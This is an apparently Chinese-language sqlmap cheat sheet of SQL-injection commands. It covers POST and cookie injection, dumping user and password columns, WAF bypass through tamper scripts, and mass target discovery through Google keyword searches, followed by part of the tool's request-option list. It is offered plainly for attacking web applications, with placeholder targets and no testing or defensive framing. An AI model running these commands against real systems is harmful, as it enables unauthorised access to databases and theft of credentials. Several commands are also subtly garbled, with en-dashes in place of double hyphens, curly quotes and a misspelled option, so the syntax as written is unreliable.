sqlmap
SqlMap POST注入
自動檢測
sqlmap -u “http://www.xxx.com/news?id=1″ –smart –level 3 –users
單個注入
sqlmap -u “http://www.xxx.com/1.php” –data=”id=1″
多個post值注入
sqlmap -u “http://www.xxx.com/vuln.php” –data=”query=foobar;id=1″ –param-del=”;” -f –banner –dbs –users
自動注入
sqlmap -u http://xxxx.xxxx.com/Login.asp –forms
導入文件注入
sqlmap -r key.txt “name,pass” //不知道 key.txt 的位置
登錄post注冊
sqlmap -u “http://www.xxx.com/vuln.php” –data=”query=foobar;id=1″ –param-del=”;” –cookies=”登錄成功的cookie信息” -f –banner –dbs –users
SqlMap COOkie 注入
單個注入
sqlmap “http://127.0.0.1/base.php” –cookie “id=1″ –dbs –level 2
sqlmap -u “url” –cookie “id=” –clumns -T 表段 –level 2
sqlmap -u “url” –cookie “id=” –dump -T 表段 -C “user,pass” –level 2
偽靜態注入:
sqlmap -u url/x*.html –dbs
請求延時注入:
sqlmap –dbs -u usr/x*.html –delay 1(時間,可隨意)
sqlmap –dbs -u usr/x*.html –safe-freq 1(次數,可隨意)
————————————————————————–
繞過WAF防火牆:
sqlmap -u url -v 3 –dbs –batch –tamper “space2morehash.py”
1.space2hash.py 2.base64encode.py 3.charencode.py
————————————————————————–
Google批量檢測注入:
sqlmap -g 關鍵詞
Request(請求)::
這些選項可以用來指定如何連接到目標URL。
–data=DATA 通過POST發送的數據字符串
–cookie=COOKIE HTTP Cookie頭
–cookie-urlencode URL 編碼生成的cookie注入
–drop-set-cookie 忽略響應的Set – Cookie頭信息
–user-agent=AGENT 指定 HTTP User – Agent頭
–random-agent 使用隨機選定的HTTP User – Agent頭
–referer=REFERER 指定 HTTP Referer頭
–headers=HEADERS 換行分開,加入其他的HTTP頭
–auth-type=ATYPE HTTP身份驗證類型(基本,摘要或NTLM)(Basic, Digest or NTLM)
–auth-cred=ACRED HTTP身份驗證憑據(用戶名:密碼)
–auth-cert=ACERT HTTP認證證書(key_file,cert_file)
–proxy=PROXY 使用HTTP代理連接到目標URL
–proxy-cred=PCRED HTTP代理身份驗證憑據(用戶名:密碼)
–ignore-proxy 忽略系統默認的HTTP代理
–delay=DELAY 在每個HTTP請求之間的延遲時間,單位為秒
–timeout=TIMEOUT 等待連接超時的時間(默認為30秒)
–retries=RETRIES 連接超時后重新連接的時間(默認3)
–scope=SCOPE 從所提供的代理日志中過濾器目標的正則表達式
–safe-url=SAFURL 在測試過程中經常訪問的url地址